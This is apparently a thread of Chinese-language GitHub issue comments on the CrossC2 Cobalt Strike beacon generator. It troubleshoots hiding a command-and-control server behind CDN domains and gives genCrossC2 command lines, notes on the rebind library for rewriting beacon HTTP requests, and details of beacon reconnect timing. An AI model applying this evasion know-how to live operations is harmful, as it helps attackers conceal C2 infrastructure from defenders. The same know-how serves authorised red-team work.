hooooooooooook

> 走cdn域名加速来隐藏c2服务器未成功： > ... > 4. genCrossC2命令：./genCrossC2.MacOS xx.cloudfront.net 443 ./.cobaltstrike.beacon_keys null Linux x64 domain > 5.cs listener配置如下 > ... @ATpiu 1. 这里的host应当指定CDN解析IP或者IP列表(列表类型中每个IP用逗号间隔)，比如 `./genCrossC2.MacOS 11.11.11.11,22.22.22.22,33.33.33.33 443 ./.cobaltstrike.beacon_keys rebind_x64.so Linux x64 domain`...

@pwnninja @ATpiu 建议以后新开issue，这里没有提示😿 这里CDN无法上线的原因是因为没有配置rebind库，参考上期回复，否则最终发送的包为 ``` GET / HTTP/1.1 Host: x.x.x.x(CDN IP) Accept: */* ... metadata ``` 这样的数据包到CDN服务器后，因为内容并不符合转发的请求，如`HOST`字段等，所以会丢弃，这种需要修改HTTP请求包的上线方式，不论是否配置其他c2profile，都需要借助指定rebind库来完成。 > > 走cdn域名加速来隐藏c2服务器未成功： > > ... > > 4. genCrossC2命令：./genCrossC2.MacOS xx.cloudfront.net 443 ./.cobaltstrike.beacon_keys...

@yanghaoi CF的CDN请尝试使用该版本： https://github.com/gloxec/CrossC2/issues/87#issuecomment-872095711 生成时指定域名: `./genCrossC2 域名`，由CDN IP改为域名

@yanghaoi beacon进程还在吗？在的话抓包看看是否还在和CDN通信呢？以及尝试在rebind.so中输出通信交互内容，看数据是否在正常传递？ 如果不在的话，检查是否是rebind.so处理数据时导致异常退出？

@yanghaoi @mackleadmire 发现beacon绑定了rebind库后还是与部分CDN通信失败的错误，新版本 **v3.1.0** 已修复该问题 https://github.com/gloxec/CrossC2/releases/tag/v3.1.0

是使用了域名上线的方式吗？发现仅指定域名上线的方式在部分平台上存在问题，暂时请使用指定IP的方式，将在下一版中进行修复

@a646465071 新版 **v3.1.0** 已修复该问题 https://github.com/gloxec/CrossC2/releases/tag/v3.1.0

参考是否是类似问题： https://github.com/gloxec/CrossC2/issues/156#issuecomment-1107739054

> c2profile.c里面已经添加了相关的容错代码，实际的c2并未退出 > 不再调用 cc2_rebind_http_get_send函数 > 怀疑和retryCount可能有关 建议在c2profile.c中编写 retryCount函数，beacon内部默认的机制是当未获取到正常心跳/任务时，会采用 **逐渐延长sleep** 的机制： 每次尝试连接后都会进行sleep 首先会 sleep 10s -> 120s -> 240s ... 下的错误重连20次 20次错误后开始进行按 小时 来进行 sleep，当多次错误后就会尝试增加1小时， 1h-> 2h -> 3h ->...

复现环境： 3. 采用类似相同架构 cf -> proxy -> teamserver ，测试teamserver & proxy & cf 关闭都可以保持正常状态 6. 这里的nginx502是否是nginx的某些配置导致的错误？或者是profile.c中定义的一些特殊HTTP头造成的 7. 这个行为像两种情况造成的 A. 是beacon HTTP请求后，server未响应，导致连接一直处于等待状态中(无主动超时断开的设计，靠操作系统自身超时断开) B. 是beacon请求后，server响应不正确，例如HTTP响应需接受103字节，实际仅接收到102字节，那么这里会卡在最后一个字节的接收上，直至超时退出进入下一次请求寻队列 8. & 9. 均可印证 7. 的推测 10....